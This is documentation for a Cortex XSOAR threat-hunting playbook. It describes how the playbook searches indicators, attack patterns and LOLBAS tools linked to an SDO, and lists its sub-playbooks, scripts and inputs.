Proactive Threat Hunting - SDO Threat Hunting
This Playbook is part of the Proactive Threat Hunting Pack.#
Supported versions
Available on Cortex XSOAR (versions 6.9.0 and later).
This playbook will be executed when the analyst chooses to perform SDO hunting. The playbook receives an SDO type indicator and executes the following steps:
- Searches IOCs related to the SDO indicator - IPs, Hashes, Domains, URLs.
- Hunts for the found IOCs using the "Threat Hunting - Generic" sub-playbook.
- Searches attack patterns that are related to the SDO indicator.
- Searches LOLBAS tools that are related to the found attack patterns.
- Hunts for LOLBin executions command-line arguments that are similar to LOLBAS malicious commands patterns.
Dependencies#
This playbook uses the following sub-playbooks, integrations, and scripts.
Sub-playbooks#
- Threat Hunting - Generic
- Search LOLBAS Tools By Name
- TIM - Indicator Relationships Analysis
- Search and Compare Process Executions - Generic
Integrations#
This playbook does not use any integrations.
Scripts#
- SearchIndicatorRelationships
- Set
- SearchIndicator
- JsonToTable
Commands#
- setIncident
- appendIndicatorField
- associateIndicatorsToIncident
Playbook Inputs#
| Name | Description | Default Value | Required |
|---|---|---|---|
| SDOName | The SDO name. | Optional | |
| SDOType | The SDO type. | Campaign | Optional |
| HuntingTimeFrame | Time in relative date or range format (for example: "1 day", "3 weeks ago", "between 2021-01-01 12:34:56 +02:00 and 2021-02-01 12:34:56 +02:00"). The default is the last 24 hours. | 30 days | Optional |
| StringSimilarityThreshold | StringSimilarity automation threshold. StringSimilarity is being used in this playbook to compare between pattern of malicious use in a tool and command-line arguments found in the environment. Please provide number between 0 and 1, where 1 represents the most similar results of string comparisons. The automation will output only the results with a similarity score equal to or greater than the specified threshold. | Optional |
Playbook Outputs#
There are no outputs for this playbook.
Playbook Image#
